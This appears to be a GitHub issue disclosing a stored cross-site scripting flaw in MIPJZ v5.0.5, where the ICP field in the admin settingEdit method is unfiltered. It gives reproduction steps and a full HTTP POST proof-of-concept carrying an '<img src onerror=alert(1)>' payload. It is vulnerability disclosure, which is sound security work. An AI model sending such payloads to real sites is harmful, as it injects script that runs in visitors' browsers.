mipjz
mipjz copied to clipboard
sansanyun
There is a storage type cross site script in MIPJZ v5.0.5
Vulnerability product: mipjz
Vulnerability version: 5.0.5
Source code link: https://github.com/sansanyun/mipjz/archive/refs/heads/master.zip
Vulnerability type: Storage XSS
Vulnerability details:
In the settingEdit method of the mipjz\app\setting\controller\ApiAdminSetting.php file, all passed values are assigned to $settingInfo, and the value of the ICP parameter is not filtered.
Vulnerability location:mipjz\app\setting\controller\ApiAdminSetting.php#settingEdit method
Vulnerability reproduction:
Background administrator rights
Open: http://192.168.0.105:82/index.php?s=/admin/#/setting/setting/
Insert<img src oneror=alert (1)> in the ICP filing number and click save now.
Open again: http://192.168.0.105:82
pop-up notification
POC:
POST /index.php?s=/setting/ApiAdminSetting/settingEdit HTTP/1.1
Host: mipjz.com:82
Content-Length: 1904
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
dataId:
Content-Type: application/json;charset=UTF-8
Origin: http://mipjz.com:82
Referer: http://mipjz.com:82/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=84a79679dc650a2da1270dfa0aed683d;
Connection: close
{"setting":"{\"siteName\":\"MIP建站系统\",\"keywords\":\"\",\"description\":\"\",\"template\":\"default\",\"domain\":\"\",\"uploadPath\":\"\",\"uploadUrl\":\"uploads\",\"statistical\":\"\",\"icp\":\"<img src onerror=alert(1)>\",\"systemStatus\":true,\"systemType\":\"cms\",\"idStatus\":false,\"mipDomain\":\"\",\"articleModelName\":\"文章\",\"loginStatus\":true,\"registerStatus\":false,\"articleModelUrl\":\"article\",\"askModelName\":\"问答\",\"askModelUrl\":\"ask\",\"userModelName\":\"用户\",\"userModelUrl\":\"user\",\"codeCompression\":false,\"indexTitle\":\"\",\"baiduSpider\":true,\"baiduMip\":\"1\",\"localCurrentVersionNum\":\"500\",\"localCurrentVersion\":\"v5.0.0\",\"titleSeparator\":\"_\",\"pcStatistical\":\"\",\"httpType\":\"http://\",\"mipApiAddress\":\"\",\"articlePages\":false,\"tagModelName\":\"标签\",\"tagModelUrl\":\"tag\",\"loginCaptcha\":true,\"registerCaptcha\":\"1\",\"biaduZn\":\"12775452642328057043\",\"articleStatus\":\"1\",\"askStatus\":\"\",\"aritcleLevelRemove\":false,\"askLevelRemove\":\"\",\"articleDomain\":\"\",\"askDomain\":\"\",\"superSites\":false,\"rewrite\":false,\"topDomain\":\"\",\"superTpl\":false,\"diyUrlStatus\":false,\"urlApiAddress\":null,\"mipPostStatus\":false,\"mipTemplate\":\"default\",\"articlePagesNum\":\"1000\",\"urlPageBreak\":\"_\",\"urlCategory\":false,\"baiduSearchPcUrl\":\"/baiduSitemapPc.xml\",\"baiduSearchMUrl\":\"http:///baiduSitemapMobile.xml\",\"baiduYuanChuangUrl\":\"\",\"baiduTimePcUrl\":\"\",\"baiduTimeMUrl\":null,\"publishTime\":null,\"baiduYuanChuangStatus\":false,\"baiduTimePcStatus\":false,\"baiduTimeMStatus\":false,\"guanfanghaoStatus\":false,\"guanfanghaoUrl\":\"\",\"guanfanghaoStatusPost\":false,\"guanfanghaoCambrian\":\"<mip-cambrian site-id=\\\"官方号ID\\\"></mip-cambrian>\\n\",\"guanfanghaoRealtimeUrl\":\"\",\"topStatus\":null,\"productModelUrl\":\"product\",\"productModelName\":\"产品\"}"}
